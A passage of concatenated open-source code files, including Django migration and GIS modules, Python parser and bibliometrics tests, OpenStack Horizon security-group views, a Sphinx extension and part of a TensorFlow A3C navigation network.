            'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'use_leads': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'use_opportunities': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'use_sales': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
        },
        'sales.subscription': {
            'Meta': {'ordering': "['expiry']", 'object_name': 'Subscription', '_ormbases': ['core.Object']},
            'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
            'cycle_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
            'cycle_period': ('django.db.models.fields.CharField', [], {'default': "'month'", 'max_length': '32'}),
            'details': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
            'expiry': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Product']", 'null': 'True', 'blank': 'True'}),
            'start': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'})
        }
    }
    complete_apps = ['sales']
| mit |
jmullan/pep257 | src/tests/test_definitions.py | 3 | 5129 | import os
import pytest
from ..pep257 import (StringIO, TokenStream, Parser, Error, check,
Module, Class, Method, Function, NestedFunction,
ErrorRegistry, AllError)
_ = type('', (), dict(__repr__=lambda *a: '_', __eq__=lambda *a: True))()
parse = Parser()
source = '''
"""Module."""
__all__ = ('a', 'b'
'c',)
def function():
"Function."
def nested_1():
"""Nested."""
if True:
def nested_2():
pass
class class_(object):
"""Class."""
def method_1(self):
"""Method."""
def method_2(self):
def nested_3(self):
"""Nested."""
'''
source_alt = '''
__all__ = ['a', 'b'
'c',]
'''
source_alt_nl_at_bracket = '''
__all__ = [
# Inconvenient comment.
'a', 'b' 'c',]
'''
source_unicode_literals = '''
from __future__ import unicode_literals
'''
source_multiple_future_imports = '''
from __future__ import (nested_scopes as ns,
unicode_literals)
'''
source_complex_all = '''
import foo
import bar
__all__ = (foo.__all__ +
bar.__all)
'''
def test_parser():
    """Parse the fixture modules and verify the resulting definition tree.

    Uses the `_` wildcard sentinel so each equality check only pins the
    fields the assertion cares about (name, docstring, parent, __all__).
    """
    dunder_all = ('a', 'bc')
    module = parse(StringIO(source), 'file.py')
    # Iterating a Module yields every definition it contains (recursively).
    assert len(list(module)) == 8
    assert Module('file.py', _, 1, len(source.split('\n')),
                  _, '"""Module."""', _, _, dunder_all, {}) == \
        module
    function, class_ = module.children
    assert Function('function', _, _, _, _, '"Function."', _,
                    module) == function
    assert Class('class_', _, _, _, _, '"""Class."""', _, module) == class_
    nested_1, nested_2 = function.children
    assert NestedFunction('nested_1', _, _, _, _,
                          '"""Nested."""', _, function) == nested_1
    assert NestedFunction('nested_2', _, _, _, _, None, _,
                          function) == nested_2
    assert nested_1.is_public is False
    method_1, method_2 = class_.children
    assert method_1.parent == method_2.parent == class_
    assert Method('method_1', _, _, _, _, '"""Method."""', _,
                  class_) == method_1
    assert Method('method_2', _, _, _, _, None, _, class_) == method_2
    nested_3, = method_2.children
    assert NestedFunction('nested_3', _, _, _, _,
                          '"""Nested."""', _, method_2) == nested_3
    # Nested definitions still see the module and its __all__.
    assert nested_3.module == module
    assert nested_3.all == dunder_all
    # List-style and newline-after-bracket __all__ declarations parse the same.
    module = parse(StringIO(source_alt), 'file_alt.py')
    assert Module('file_alt.py', _, 1, len(source_alt.split('\n')),
                  _, None, _, _, dunder_all, {}) == module
    module = parse(StringIO(source_alt_nl_at_bracket), 'file_alt_nl.py')
    assert Module('file_alt_nl.py', _, 1,
                  len(source_alt_nl_at_bracket.split('\n')), _, None, _, _,
                  dunder_all, {}) == module
    # __future__ imports are collected into the module's future_imports dict.
    module = parse(StringIO(source_unicode_literals), 'file_ucl.py')
    assert Module('file_ucl.py', _, 1,
                  _, _, None, _, _,
                  _, {'unicode_literals': True}) == module
    module = parse(StringIO(source_multiple_future_imports), 'file_mfi.py')
    assert Module('file_mfi.py', _, 1,
                  _, _, None, _, _,
                  _, {'unicode_literals': True, 'nested_scopes': True}) \
        == module
    assert module.future_imports['unicode_literals']
    # A non-literal __all__ expression cannot be evaluated statically.
    with pytest.raises(AllError):
        parse(StringIO(source_complex_all), 'file_complex_all.py')
def _test_module():
    """Disabled (leading underscore keeps pytest from collecting it).

    NOTE(review): expects docstrings ('Module docstring.') that the current
    `source` fixture does not contain -- presumably kept for reference only.
    """
    module = Module(source, 'module.py')
    assert module.source == source
    assert module.parent is None
    assert module.name == 'module'
    assert module.docstring == '"""Module docstring."""'
    assert module.is_public

    function, = module.children
    assert function.source.startswith('def function')
    assert function.source.endswith('pass\n')
    assert function.parent is module
    assert function.name == 'function'
    assert function.docstring == '"""Function docstring."""'
def test_token_stream():
    """TokenStream exposes the current token, its line, and move() semantics."""
    tokens = TokenStream(StringIO('hello#world'))
    # Before any move(), the first token is current.
    assert tokens.line == 1
    assert tokens.current.value == 'hello'
    # move() returns the token that *was* current, then advances past it.
    moved = tokens.move()
    assert moved.value == 'hello'
    assert tokens.current.value == '#world'
    assert tokens.line == 1
def test_pep257():
    """Run domain-specific tests from test.py file."""
    test_cases = ('test', 'unicode_literals', 'nested_class')
    for test_case in test_cases:
        # Relative import (level=1) of tests/test_cases/<name>.py; each
        # case module defines an `expectation` listing the expected errors.
        case_module = __import__('test_cases.{0}'.format(test_case),
                                 globals=globals(),
                                 locals=locals(),
                                 fromlist=['expectation'],
                                 level=1)
        # from .test_cases import test
        results = list(check([os.path.join(os.path.dirname(__file__),
                                           'test_cases', test_case + '.py')],
                             select=set(ErrorRegistry.get_error_codes())))
        for error in results:
            assert isinstance(error, Error)
        # Compare (definition name, message) pairs against the expectation.
        results = set([(e.definition.name, e.message) for e in results])
        assert case_module.expectation.expected == results
| mit |
networks-lab/metaknowledge | metaknowledge/tests/test_scopus.py | 2 | 2670 | #Written by Reid McIlroy-Young for Dr. John McLevey, University of Waterloo 2016
import unittest
import metaknowledge
import os
class TestScopus(unittest.TestCase):
    """Integration tests for ScopusRecord/RecordCollection, driven by the
    scopus_testing.csv.scopus fixture shipped with the test suite."""

    def setUp(self):
        metaknowledge.VERBOSE_MODE = False
        self.RC = metaknowledge.RecordCollection("metaknowledge/tests/scopus_testing.csv.scopus")
        self.R = self.RC.peek()

    def test_creation(self):
        # Rebuilding a record from its own field dict yields an equal record.
        Rstart = self.RC.peek()
        R = metaknowledge.ScopusRecord(Rstart._fieldDict)
        self.assertEqual(R, Rstart)
        with open("metaknowledge/tests/scopus_testing.csv.scopus") as f:
            f.read(1)  # skip the first byte -- presumably a BOM/marker; confirm against the fixture
            header = f.readline()[:-1].split(',')
            R = metaknowledge.ScopusRecord(f.readline(), header = header)
            self.assertEqual(R.id, 'EID:2-s2.0-84963944162')
            R = metaknowledge.ScopusRecord(f.readline(), header = header)
            self.assertEqual(R.id, 'EID:2-s2.0-84943362392')
        # Non-string/dict input is rejected outright.
        with self.assertRaises(TypeError):
            R = metaknowledge.ScopusRecord(12345678)
        # A malformed CSV line yields a record flagged bad ...
        R = metaknowledge.ScopusRecord(",2132,4,3fdgf,fgdgdfdg,dgfdg,,,,,,,,,,,,,,,,,,,2e5r6t789765432\n")
        self.assertTrue(R.bad)
        # ... and bad records refuse to be serialised.
        with self.assertRaises(metaknowledge.BadScopusRecord):
            R.writeRecord('not a file')

    def test_isCollection(self):
        self.assertIsInstance(self.RC, metaknowledge.RecordCollection)

    def test_isScopus(self):
        self.assertIsInstance(self.R, metaknowledge.ScopusRecord)

    def test_specials(self):
        # Every special (computed) tag must return a supported value type.
        for R in self.RC:
            for s in metaknowledge.scopus.scopusSpecialTagToFunc.keys():
                self.assertIsInstance(R.get(s), (str, type(None), list, int, metaknowledge.Citation))

    def test_allFields(self):
        # Raw field dict: string keys, str/list/int values only.
        for R in self.RC:
            for k, v in R.items():
                self.assertIsInstance(k, str)
                self.assertIsInstance(v, (str, list, int))

    def test_graphs(self):
        # Golden-value summaries of the co-author and citation networks.
        self.assertEqual(metaknowledge.graphStats(self.RC.networkCoAuthor(), sentenceString = True), "The graph has 1798 nodes, 89236 edges, 36 isolates, 15 self loops, a density of 0.0552422 and a transitivity of 0.994673")
        self.assertEqual(metaknowledge.graphStats(self.RC.networkCitation(), sentenceString = True), "The graph has 10026 nodes, 10362 edges, 0 isolates, 0 self loops, a density of 0.000103094 and a transitivity of 0")

    def test_write(self):
        fileName = 'tempFile.scopus.tmp'
        self.RC.writeFile(fileName)
        self.assertEqual(os.path.getsize(fileName), os.path.getsize("metaknowledge/tests/scopus_testing.csv.scopus") + 11511) #Not quite identical due to double quotes
        os.remove(fileName)
| gpl-2.0 |
pasqualguerrero/django | django/contrib/gis/geos/prototypes/geom.py | 288 | 4069 | from ctypes import POINTER, c_char_p, c_int, c_size_t, c_ubyte
from django.contrib.gis.geos.libgeos import CS_PTR, GEOM_PTR, GEOSFuncFactory
from django.contrib.gis.geos.prototypes.errcheck import (
check_geom, check_minus_one, check_sized_string, check_string, check_zero,
)
# This is the return type used by binary output (WKB, HEX) routines.
c_uchar_p = POINTER(c_ubyte)
# We create a simple subclass of c_char_p here because when the response
# type is set to c_char_p, you get a _Python_ string and there's no way
# to access the string's address inside the error checking function.
# In other words, you can't free the memory allocated inside GEOS. Previously,
# the return type would just be omitted and the integer address would be
# used -- but this allows us to be specific in the function definition and
# keeps the reference so it may be free'd.
class geos_char_p(c_char_p):
    # Subclassed (rather than using c_char_p directly) so errcheck callbacks
    # receive the raw pointer object and can free the GEOS-allocated string;
    # see the explanatory comment above.
    pass
# ### ctypes factory classes ###
class BinConstructor(GEOSFuncFactory):
    "Generates a prototype for binary construction (HEX, WKB) GEOS routines."
    # (buffer, buffer_size) -> geometry pointer; NULL is turned into an error.
    argtypes = [c_char_p, c_size_t]
    restype = GEOM_PTR
    errcheck = staticmethod(check_geom)
# HEX & WKB output
class BinOutput(GEOSFuncFactory):
    "Generates a prototype for the routines that return a sized string."
    # (geometry, out-param: string length) -> unsigned char buffer.
    argtypes = [GEOM_PTR, POINTER(c_size_t)]
    restype = c_uchar_p
    errcheck = staticmethod(check_sized_string)
class GeomOutput(GEOSFuncFactory):
    "For GEOS routines that return a geometry."
    restype = GEOM_PTR
    errcheck = staticmethod(check_geom)

    def get_func(self, argtypes):
        # Argument types vary per routine, so they are supplied at build time.
        self.argtypes = argtypes
        return super(GeomOutput, self).get_func()
class IntFromGeom(GEOSFuncFactory):
    "Argument is a geometry, return type is an integer."
    argtypes = [GEOM_PTR]
    restype = c_int

    def get_func(self, zero=False):
        # GEOS integer routines signal failure with either 0 or -1; select
        # the matching error-check routine before building the prototype.
        self.errcheck = check_zero if zero else check_minus_one
        return super(IntFromGeom, self).get_func()
class StringFromGeom(GEOSFuncFactory):
    "Argument is a Geometry, return type is a string."
    argtypes = [GEOM_PTR]
    # geos_char_p (not c_char_p) so errcheck can free the GEOS buffer.
    restype = geos_char_p
    errcheck = staticmethod(check_string)
# ### ctypes prototypes ###

# Deprecated creation routines from WKB, HEX, WKT
from_hex = BinConstructor('GEOSGeomFromHEX_buf')
from_wkb = BinConstructor('GEOSGeomFromWKB_buf')
from_wkt = GeomOutput('GEOSGeomFromWKT', [c_char_p])

# Deprecated output routines
to_hex = BinOutput('GEOSGeomToHEX_buf')
to_wkb = BinOutput('GEOSGeomToWKB_buf')
to_wkt = StringFromGeom('GEOSGeomToWKT')

# The GEOS geometry type, typeid, num_coordinates and number of geometries
geos_normalize = IntFromGeom('GEOSNormalize')
geos_type = StringFromGeom('GEOSGeomType')
geos_typeid = IntFromGeom('GEOSGeomTypeId')
get_dims = IntFromGeom('GEOSGeom_getDimensions', zero=True)  # uses check_zero, not check_minus_one
get_num_coords = IntFromGeom('GEOSGetNumCoordinates')
get_num_geoms = IntFromGeom('GEOSGetNumGeometries')

# Geometry creation factories
create_point = GeomOutput('GEOSGeom_createPoint', [CS_PTR])
create_linestring = GeomOutput('GEOSGeom_createLineString', [CS_PTR])
create_linearring = GeomOutput('GEOSGeom_createLinearRing', [CS_PTR])

# Polygon and collection creation routines are special and will not
# have their argument types defined.
create_polygon = GeomOutput('GEOSGeom_createPolygon', None)
create_collection = GeomOutput('GEOSGeom_createCollection', None)

# Ring routines
get_extring = GeomOutput('GEOSGetExteriorRing', [GEOM_PTR])
get_intring = GeomOutput('GEOSGetInteriorRingN', [GEOM_PTR, c_int])
get_nrings = IntFromGeom('GEOSGetNumInteriorRings')

# Collection Routines
get_geomn = GeomOutput('GEOSGetGeometryN', [GEOM_PTR, c_int])

# Cloning
geom_clone = GEOSFuncFactory('GEOSGeom_clone', argtypes=[GEOM_PTR], restype=GEOM_PTR)

# Destruction routine.
destroy_geom = GEOSFuncFactory('GEOSGeom_destroy', argtypes=[GEOM_PTR])

# SRID routines
geos_get_srid = GEOSFuncFactory('GEOSGetSRID', argtypes=[GEOM_PTR], restype=c_int)
geos_set_srid = GEOSFuncFactory('GEOSSetSRID', argtypes=[GEOM_PTR, c_int])
| bsd-3-clause |
jumpstarter-io/horizon | openstack_dashboard/dashboards/project/access_and_security/security_groups/views.py | 15 | 5229 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing instances.
"""
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import tables
from horizon.utils import memoized
from openstack_dashboard import api
from openstack_dashboard.utils import filters
from openstack_dashboard.dashboards.project.access_and_security.\
security_groups import forms as project_forms
from openstack_dashboard.dashboards.project.access_and_security.\
security_groups import tables as project_tables
class DetailView(tables.DataTableView):
    """Table view listing the rules of a single security group."""
    table_class = project_tables.RulesTable
    template_name = 'project/access_and_security/security_groups/detail.html'

    @memoized.memoized_method
    def _get_data(self):
        # Fetch the security group once per request; redirect on failure.
        group_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])
        try:
            return api.network.security_group_get(self.request, group_id)
        except Exception:
            redirect = reverse('horizon:project:access_and_security:index')
            exceptions.handle(self.request,
                              _('Unable to retrieve security group.'),
                              redirect=redirect)

    def get_data(self):
        security_group = self._get_data()
        if security_group is None:
            return []
        # Stable ordering: protocol first, then starting port.
        return sorted(security_group.rules,
                      key=lambda rule: (rule.ip_protocol, rule.from_port))

    def get_context_data(self, **kwargs):
        context = super(DetailView, self).get_context_data(**kwargs)
        context["security_group"] = self._get_data()
        return context
class UpdateView(forms.ModalFormView):
    """Modal form for editing an existing security group's name and
    description."""
    form_class = project_forms.UpdateGroup
    template_name = 'project/access_and_security/security_groups/update.html'
    success_url = reverse_lazy('horizon:project:access_and_security:index')

    @memoized.memoized_method
    def get_object(self):
        # Memoized: called from both get_context_data and get_initial.
        sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])
        try:
            return api.network.security_group_get(self.request, sg_id)
        except Exception:
            msg = _('Unable to retrieve security group.')
            url = reverse('horizon:project:access_and_security:index')
            exceptions.handle(self.request, msg, redirect=url)

    def get_context_data(self, **kwargs):
        context = super(UpdateView, self).get_context_data(**kwargs)
        context["security_group"] = self.get_object()
        return context

    def get_initial(self):
        security_group = self.get_object()
        return {'id': self.kwargs['security_group_id'],
                'name': security_group.name,
                'description': security_group.description}
class AddRuleView(forms.ModalFormView):
    """Modal form for adding a rule to an existing security group."""
    form_class = project_forms.AddRule
    template_name = 'project/access_and_security/security_groups/add_rule.html'

    def get_success_url(self):
        # Return to the detail page of the group the rule was added to.
        group_id = self.kwargs['security_group_id']
        return reverse("horizon:project:access_and_security:"
                       "security_groups:detail", args=[group_id])

    def get_context_data(self, **kwargs):
        context = super(AddRuleView, self).get_context_data(**kwargs)
        context["security_group_id"] = self.kwargs['security_group_id']
        return context

    def get_initial(self):
        return {'id': self.kwargs['security_group_id']}

    def get_form_kwargs(self):
        kwargs = super(AddRuleView, self).get_form_kwargs()
        try:
            groups = api.network.security_group_list(self.request)
        except Exception:
            groups = []
            exceptions.handle(self.request,
                              _("Unable to retrieve security groups."))

        # Build (id, label) choices, tagging the group currently being edited.
        current_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])
        choices = []
        for group in groups:
            if group.id == current_id:
                label = _("%s (current)") % group.name
            else:
                label = group.name
            choices.append((group.id, label))
        kwargs['sg_list'] = choices
        return kwargs
class CreateView(forms.ModalFormView):
    """Modal form for creating a new security group."""
    form_class = project_forms.CreateGroup
    template_name = 'project/access_and_security/security_groups/create.html'
    success_url = reverse_lazy('horizon:project:access_and_security:index')
| apache-2.0 |
safy-group/safy-api | vendor/doctrine/orm/docs/en/_exts/configurationblock.py | 2577 | 3506 | #Copyright (c) 2010 Fabien Potencier
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
from docutils.parsers.rst import Directive, directives
from docutils import nodes
from string import upper
class configurationblock(nodes.General, nodes.Element):
    # Custom docutils node marking a group of alternative code blocks;
    # rendered by the visit/depart callbacks registered in setup().
    pass
class ConfigurationBlock(Directive):
    """Directive grouping equivalent configuration snippets (YAML, XML,
    PHP, ...) into one labelled bullet list wrapped in a custom node."""
    has_content = True
    required_arguments = 0
    optional_arguments = 0
    final_argument_whitespace = True
    option_spec = {}
    # Maps pygments language names to the human-readable label shown above
    # each alternative.  NOTE(review): an unknown language key raises
    # KeyError in run() -- documents must stick to these keys.
    formats = {
        'html': 'HTML',
        'xml': 'XML',
        'php': 'PHP',
        'yaml': 'YAML',
        'jinja': 'Twig',
        'html+jinja': 'Twig',
        'jinja+html': 'Twig',
        'php+html': 'PHP',
        'html+php': 'PHP',
        'ini': 'INI',
        'php-annotations': 'Annotations',
    }

    def run(self):
        # env kept for the commented-out anchor logic below.
        env = self.state.document.settings.env

        node = nodes.Element()
        node.document = self.state.document
        self.state.nested_parse(self.content, self.content_offset, node)

        # Turn every literal (code) block into a list item headed by the
        # emphasised language label; non-literal children are dropped.
        entries = []
        for i, child in enumerate(node):
            if isinstance(child, nodes.literal_block):
                # add a title (the language name) before each block
                #targetid = "configuration-block-%d" % env.new_serialno('configuration-block')
                #targetnode = nodes.target('', '', ids=[targetid])
                #targetnode.append(child)

                innernode = nodes.emphasis(self.formats[child['language']], self.formats[child['language']])

                para = nodes.paragraph()
                para += [innernode, child]

                entry = nodes.list_item('')
                entry.append(para)
                entries.append(entry)

        resultnode = configurationblock()
        resultnode.append(nodes.bullet_list('', *entries))

        return [resultnode]
def visit_configurationblock_html(self, node):
    # Wrap the alternatives in a styled <div> for the HTML builder.
    self.body.append(self.starttag(node, 'div', CLASS='configuration-block'))
def depart_configurationblock_html(self, node):
    # Close the <div> opened by the matching visit callback.
    self.body.append('</div>\n')
def visit_configurationblock_latex(self, node):
    # No special markup for LaTeX output.
    pass
def depart_configurationblock_latex(self, node):
    # No special markup for LaTeX output.
    pass
def setup(app):
    """Sphinx extension entry point: register the node and the directive."""
    app.add_node(configurationblock,
                 html=(visit_configurationblock_html, depart_configurationblock_html),
                 latex=(visit_configurationblock_latex, depart_configurationblock_latex))
    app.add_directive('configuration-block', ConfigurationBlock)
| mit |
andzaytsev/deepnav | GA3C_LSTM_NAV_D/NetworkVP.py | 1 | 19714 | # Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import re
import numpy as np
import tensorflow as tf
from Config import Config
class NetworkVP:
def __init__(self, device, model_name, num_actions):
self.device = device
self.model_name = model_name
self.num_actions = num_actions
self.img_width = Config.IMAGE_WIDTH
self.img_height = Config.IMAGE_HEIGHT
self.img_channels = Config.IMAGE_DEPTH * Config.STACKED_FRAMES
self.learning_rate = Config.LEARNING_RATE_START
self.beta = Config.BETA_START
self.log_epsilon = Config.LOG_EPSILON
self.graph = tf.Graph()
with self.graph.as_default() as g:
with tf.device(self.device):
self._create_graph()
self.sess = tf.Session(
graph=self.graph,
config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=False,
gpu_options=tf.GPUOptions(allow_growth=True)))
self.sess.run(tf.global_variables_initializer())
if Config.TENSORBOARD: self._create_tensor_board()
if Config.LOAD_CHECKPOINT or Config.SAVE_MODELS:
vars = tf.global_variables()
self.saver = tf.train.Saver({var.name: var for var in vars}, max_to_keep=0)
def _create_graph(self):
self.x = tf.placeholder(
tf.float32, [None, self.img_height, self.img_width, self.img_channels], name='X')
self.y_r = tf.placeholder(tf.float32, [None], name='Yr')
self.p_rewards = tf.placeholder(tf.float32, [None, 1], name='p_rewards')
self.aux_inp = tf.placeholder(tf.float32, shape=[None, self.num_actions+Config.VEL_DIM], name='aux_input')
self.depth_labels = [tf.placeholder(tf.int32, shape=[None, Config.DEPTH_QUANTIZATION])]*Config.DEPTH_PIXELS
self.var_beta = tf.placeholder(tf.float32, name='beta', shape=[])
self.var_learning_rate = tf.placeholder(tf.float32, name='lr', shape=[])
self.global_step = tf.Variable(0, trainable=False, name='step')
# As implemented in A3C paper
self.n1 = self.conv2d_layer(self.x, 8, 16, 'conv11', strides=[1, 4, 4, 1])
self.n2 = self.conv2d_layer(self.n1, 4, 32, 'conv12', strides=[1, 2, 2, 1])
self.action_index = tf.placeholder(tf.float32, name='action_index', shape=[None, self.num_actions])
_input = self.n2
flatten_input_shape = _input.get_shape()
nb_elements = flatten_input_shape[1] * flatten_input_shape[2] * flatten_input_shape[3]
self.flat = tf.reshape(_input, shape=[-1, nb_elements._value])
self.enc_out = self.dense_layer(self.flat, 256, 'dense1') # encoder output
self.d1 = self.dense_layer(self.enc_out, 128, 'depth1')
# input to first LSTM. Add previous step rewards
self.aux1 = tf.concat((self.enc_out, self.p_rewards), axis=1)
lstm_layers = Config.NUM_LSTMS
self.seq_len = tf.placeholder(tf.int32, name='seq_len', shape=[]) # LSTM sequence length
self.state_in = [] # LSTM input state
self.state_out = [] # LSTM output state
with tf.variable_scope('lstm1'):
lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)
c_in_1 = tf.placeholder(tf.float32, name='c_1', shape=[None, lstm_cell.state_size.c])
h_in_1 = tf.placeholder(tf.float32, name='h_1', shape=[None, lstm_cell.state_size.h])
self.state_in.append((c_in_1, h_in_1))
# using tf.stack here since tf doesn't like when integers and
# placeholders are mixed together in the desired shape
rnn_in = tf.reshape(self.aux1, tf.stack([-1, self.seq_len, self.aux1.shape[1]]))
init_1 = tf.contrib.rnn.LSTMStateTuple(c_in_1, h_in_1)
lstm_outputs_1, lstm_state_1 = tf.nn.dynamic_rnn(lstm_cell, rnn_in,
initial_state=init_1, time_major=False)
lstm_outputs_1 = tf.reshape(lstm_outputs_1, [-1, 256])
self.state_out.append(tuple(lstm_state_1))
# input to second LSTM. Add previous step rewards
self.aux2 = tf.concat((self.enc_out, lstm_outputs_1), axis=1)
self.aux2 = tf.concat((self.aux2, self.aux_inp), axis=1)
with tf.variable_scope('lstm2'):
lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)
c_in_2 = tf.placeholder(tf.float32, name='c_2', shape=[None, lstm_cell.state_size.c])
h_in_2 = tf.placeholder(tf.float32, name='h_2', shape=[None, lstm_cell.state_size.h])
self.state_in.append((c_in_2, h_in_2))
rnn_in = tf.reshape(self.aux2, tf.stack([-1, self.seq_len, self.aux2.shape[1]]))
init_2 = tf.contrib.rnn.LSTMStateTuple(c_in_2, h_in_2)
lstm_outputs_2, lstm_state_2 = tf.nn.dynamic_rnn(lstm_cell, rnn_in,
initial_state=init_2, time_major=False)
self.state_out.append(tuple(lstm_state_1))
self.rnn_out = tf.reshape(lstm_outputs_2, [-1, 256])
self.d2 = self.dense_layer(self.rnn_out, 128, 'depth2')
self.logits_v = tf.squeeze(self.dense_layer(self.rnn_out, 1, 'logits_v', func=None), axis=[1])
self.logits_p = self.dense_layer(self.rnn_out, self.num_actions, 'logits_p', func=None)
if Config.USE_LOG_SOFTMAX:
self.softmax_p = tf.nn.softmax(self.logits_p)
self.log_softmax_p = tf.nn.log_softmax(self.logits_p)
self.log_selected_action_prob = tf.reduce_sum(self.log_softmax_p * self.action_index, axis=1)
self.cost_p_1 = self.log_selected_action_prob * (self.y_r - tf.stop_gradient(self.logits_v))
self.cost_p_2 = -1 * self.var_beta * \
tf.reduce_sum(self.log_softmax_p * self.softmax_p, axis=1)
else:
self.softmax_p = (tf.nn.softmax(self.logits_p) + Config.MIN_POLICY) / (1.0 + Config.MIN_POLICY * self.num_actions)
self.selected_action_prob = tf.reduce_sum(self.softmax_p * self.action_index, axis=1)
self.cost_p_1 = tf.log(tf.maximum(self.selected_action_prob, self.log_epsilon)) \
* (self.y_r - tf.stop_gradient(self.logits_v))
self.cost_p_2 = -1 * self.var_beta * \
tf.reduce_sum(tf.log(tf.maximum(self.softmax_p, self.log_epsilon)) *
self.softmax_p, axis=1)
# use a mask since we pad bactches of size < TIME_MAX
mask = tf.reduce_max(self.action_index,axis=1)
self.cost_v = 0.5 * tf.reduce_sum(tf.square(self.y_r - self.logits_v) * mask, axis=0)
self.cost_p_1_agg = tf.reduce_sum(self.cost_p_1 * mask, axis=0)
self.cost_p_2_agg = tf.reduce_sum(self.cost_p_2 * mask, axis=0)
# depth logits
self.d1_logits = [self.dense_layer(self.d1, Config.DEPTH_QUANTIZATION, 'logits_d1_%d'%i, func=None)
for i in range(Config.DEPTH_PIXELS)]
self.d2_logits = [self.dense_layer(self.d2, Config.DEPTH_QUANTIZATION, 'logits_d2_%d'%i, func=None)
for i in range(Config.DEPTH_PIXELS)]
self.d1_loss = [tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.d1_logits[i],
labels=self.depth_labels[i])*mask, axis=0) for i in range(Config.DEPTH_PIXELS)]
self.d2_loss = [tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.d2_logits[i],
labels=self.depth_labels[i])*mask, axis=0) for i in range(Config.DEPTH_PIXELS)]
# total depth loss
self.d1_loss = tf.add_n(self.d1_loss)
self.d2_loss = tf.add_n(self.d2_loss)
self.cost_p = -(self.cost_p_1_agg + self.cost_p_2_agg) + Config.BETA1*self.d1_loss + Config.BETA2*self.d2_loss
if Config.DUAL_RMSPROP:
self.opt_p = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
self.opt_v = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
else:
self.cost_all = self.cost_p + self.cost_v
